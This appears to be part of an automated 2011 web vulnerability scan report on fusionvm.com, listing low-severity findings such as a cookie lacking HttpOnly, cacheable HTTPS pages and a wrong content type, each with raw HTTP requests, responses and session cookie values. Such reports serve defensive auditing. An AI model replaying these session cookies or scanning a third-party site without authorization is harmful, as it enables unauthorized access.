OVb82iKKWoBsum0TXFLUPD0LhsQOhAJuIRVfcROviJHuycDcca7CDgteC/Ji3AahZBUwTRqmSAuBsaDIIKYcozHn8NAJQW0MMX8IdubBUg6MEJI6GXiusnJP+jhEutMuPAdy6krPV6+DRls7lDeg59/2Oc9JcPDpwOB4MkM7JBuEW5/RrKGZpV1Uwl+hKc90BnT+hymJVU3hy5/2zOjFykuQSJSC2boDskvz4SWNUYxXN6iqhzaxjSCWlniO/FUI1IoNoJWIBkC6zi/C4HDSfxvOj2CspbGLErGdWIBlzaCFqy8phZg97VkrBN9PCXLiUIskowVowVZKuQ9wZOLRi1HNMjOBjUnSRGDhKHL39xV+1a2Q1DcGzw9YVCZUABBw7AWbKr+rV1VdzMeivInTUIzfAkkWaJpOUYh8OTgmWnYyYFmwLvOnxr65qx2d6dtvIcysTN
...[SNIP]...

3.2. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Request 1

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:52:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:52:54 GMT
Content-Length: 16812


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;ItemId=35715" id="ctl00">
<div cla
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQwNzQyMTM1MQ8WAh4LVXJsUmVmZXJyZXIFNWh0dHBzOi8vd3d3LmZ1c2lvbnZtLmNvbS9GdXNpb25WTS9EZXNrdG9wRGVmYXVsdC5hc3B4FgICAQ9kFgoCAQ8PFgIeBFRleHQFekhQU0JNQTAyNjY2IFNTUlQxMDA0MzQgcmV2LjEgOiBIUCBOZXR3b3JrIEF1dG9tYXRpb24gUnVubmluZyBvbiBMaW51eCwgU29sYXJpcywgYW5kIFdpbmRvd3MsIFJlbW90ZSBJbmZvcm1hdGlvbiBEaXNjbG9zdXJlZGQCAw8PFgIfAQUPSGV3bGV0dC1QYWNrYXJkZGQCBQ8PFgIfAQUJNC8yNi8yMDExZGQCBw8PFgIfAQUJNC8yNi8yMDExZGQCCQ8PFgIfAQX1Ly0tLS0tQkVHSU4gUEdQIFNJR05FRCBNRVNTQUdFLS0tLS0KSGFzaDogU0hBMQoKU1VQUE9SVCBDT01NVU5JQ0FUSU9OIC0gU0VDVVJJVFkgQlVMTEVUSU4KCkRvY3VtZW50IElEOiBjMDI3ODk1MTQKVmVyc2lvbjogMQoKSFBTQk1BMDI2NjYgU1NSVDEwMDQzNCByZXYuMSAtIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBSdW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgV2luZG93cywgUmVtb3RlIEluZm9ybWF0aW9uIApEaXNjbG9zdXJlCgpOT1RJQ0U6IFRoZSBpbmZvcm1hdGlvbiBpbiB0aGlzIFNlY3VyaXR5IEJ1bGxldGluIHNob3VsZCBiZSBhY3RlZCB1cG9uIGFzIHNvb24gYXMgcG9zc2libGUuCgpSZWxlYXNlIERhdGU6IDIwMTEtMDQtMjEKTGFzdCBVcGRhdGVkOiAyMDExLTA0LTIxCgpQb3RlbnRpYWwgU2VjdXJpdHkgSW1wYWN0OiBSZW1vdGUgaW5mb3JtYXRpb24gZGlzY2xvc3VyZQoKU291cmNlOiBIZXdsZXR0LVBhY2thcmQgQ29tcGFueSwgSFAgU29mdHdhcmUgU2VjdXJpdHkgUmVzcG9uc2UgVGVhbQoKVlVMTkVSQUJJTElUWSBTVU1NQVJZCkEgcG90ZW50aWFsIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgaGFzIGJlZW4gaWRlbnRpZmllZCB3aXRoIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBydW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgCldpbmRvd3MuIFRoaXMgdnVsbmVyYWJpbGl0eSBjb3VsZCBiZSBleHBsb2l0ZWQgcmVtb3RlbHkgcmVzdWx0aW5nIGluIGluZm9ybWF0aW9uIGRpc2Nsb3N1cmUuCgpSZWZlcmVuY2VzOiBDVkUtMjAxMS0xNzI1CgpTVVBQT1JURUQgU09GVFdBUkUgVkVSU0lPTlMqOiBPTkxZIGltcGFjdGVkIHZlcnNpb25zIGFyZSBsaXN0ZWQuCkhQIE5ldHdvcmsgQXV0b21hdGlvbiB2Ny4yeCwgdjcuNXgsIHY3LjZ4LCB2OS4wLCB2OS4xMAoKQkFDS0dST1VORAoKQ1ZTUyAyLjAgQmFzZSBNZXRyaWNzCiYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOy
...[SNIP]...

Request 2

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:53:44 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:53:43 GMT
Content-Length: 16720


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;ItemId=35715" id="ctl00">
<div cla
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQwNzQyMTM1MQ9kFgICAQ9kFgoCAQ8PFgIeBFRleHQFekhQU0JNQTAyNjY2IFNTUlQxMDA0MzQgcmV2LjEgOiBIUCBOZXR3b3JrIEF1dG9tYXRpb24gUnVubmluZyBvbiBMaW51eCwgU29sYXJpcywgYW5kIFdpbmRvd3MsIFJlbW90ZSBJbmZvcm1hdGlvbiBEaXNjbG9zdXJlZGQCAw8PFgIfAAUPSGV3bGV0dC1QYWNrYXJkZGQCBQ8PFgIfAAUJNC8yNi8yMDExZGQCBw8PFgIfAAUJNC8yNi8yMDExZGQCCQ8PFgIfAAX1Ly0tLS0tQkVHSU4gUEdQIFNJR05FRCBNRVNTQUdFLS0tLS0KSGFzaDogU0hBMQoKU1VQUE9SVCBDT01NVU5JQ0FUSU9OIC0gU0VDVVJJVFkgQlVMTEVUSU4KCkRvY3VtZW50IElEOiBjMDI3ODk1MTQKVmVyc2lvbjogMQoKSFBTQk1BMDI2NjYgU1NSVDEwMDQzNCByZXYuMSAtIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBSdW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgV2luZG93cywgUmVtb3RlIEluZm9ybWF0aW9uIApEaXNjbG9zdXJlCgpOT1RJQ0U6IFRoZSBpbmZvcm1hdGlvbiBpbiB0aGlzIFNlY3VyaXR5IEJ1bGxldGluIHNob3VsZCBiZSBhY3RlZCB1cG9uIGFzIHNvb24gYXMgcG9zc2libGUuCgpSZWxlYXNlIERhdGU6IDIwMTEtMDQtMjEKTGFzdCBVcGRhdGVkOiAyMDExLTA0LTIxCgpQb3RlbnRpYWwgU2VjdXJpdHkgSW1wYWN0OiBSZW1vdGUgaW5mb3JtYXRpb24gZGlzY2xvc3VyZQoKU291cmNlOiBIZXdsZXR0LVBhY2thcmQgQ29tcGFueSwgSFAgU29mdHdhcmUgU2VjdXJpdHkgUmVzcG9uc2UgVGVhbQoKVlVMTkVSQUJJTElUWSBTVU1NQVJZCkEgcG90ZW50aWFsIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgaGFzIGJlZW4gaWRlbnRpZmllZCB3aXRoIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBydW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgCldpbmRvd3MuIFRoaXMgdnVsbmVyYWJpbGl0eSBjb3VsZCBiZSBleHBsb2l0ZWQgcmVtb3RlbHkgcmVzdWx0aW5nIGluIGluZm9ybWF0aW9uIGRpc2Nsb3N1cmUuCgpSZWZlcmVuY2VzOiBDVkUtMjAxMS0xNzI1CgpTVVBQT1JURUQgU09GVFdBUkUgVkVSU0lPTlMqOiBPTkxZIGltcGFjdGVkIHZlcnNpb25zIGFyZSBsaXN0ZWQuCkhQIE5ldHdvcmsgQXV0b21hdGlvbiB2Ny4yeCwgdjcuNXgsIHY3LjZ4LCB2OS4wLCB2OS4xMAoKQkFDS0dST1VORAoKQ1ZTUyAyLjAgQmFzZSBNZXRyaWNzCiYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsKICBSZWZlcmVuY2UgICAgICAgICAgICAgIEJhc2UgVmVjdG9yICAgICAgIC
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=7c08e1d9-6975-48a3-9c34-081b0ae79e10; expires=Tue, 26-Apr-2011 22:14:02 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vggqtwwd5coqz310h11pdmez; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

5. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


5.1. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Request

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:49:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 34791


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...

5.2. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Request

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:52:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:52:54 GMT
Content-Length: 16812


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;ItemId=35715" id="ctl00">
<div cla
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
Content-Length: 5561

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:04 GMT
Content-Length: 5714

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.9348020141478628<&>0ctl01$Banner$UserS
...[SNIP]...

Report generated by XSS.CX at Tue Apr 26 18:28:26 CDT 2011.